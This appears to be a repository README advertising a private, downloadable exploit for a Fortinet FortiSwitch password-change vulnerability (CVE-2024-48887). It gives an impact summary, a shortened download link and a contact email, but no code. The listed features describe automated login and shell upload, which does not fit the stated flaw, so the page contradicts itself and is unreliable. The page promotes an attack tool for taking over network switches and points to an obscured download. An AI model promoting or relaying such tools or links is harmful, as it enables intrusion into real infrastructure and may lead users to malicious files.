# CVE-2024-48887 - Unverified Password Change (CWE-620)
## Overview
An unverified password change vulnerability in the Fortinet FortiSwitch GUI allows a remote, unauthenticated attacker to change admin passwords via a specially crafted request.
## Exploit
[Download here](https://tinyurl.com/rxmjnfn7)
## Details
+ **CVE ID**: CVE-2024-48887
+ **Published**: 04/08/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
+ **Patch Available**: No official patch yet
## Impact
This critical vulnerability enables an external attacker to completely compromise administrative access to Fortinet FortiSwitch devices without requiring any authentication. An attacker could:
+ Arbitrarily change admin passwords
+ Potentially gain full control of the network switch
+ Bypass existing security controls
+ Compromise network infrastructure integrity and availability
## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.
## Contact
+ **For inquiries, please contact**: nowkie221@outlook.com
+ **Exploit**: [Download here](https://tinyurl.com/rxmjnfn7)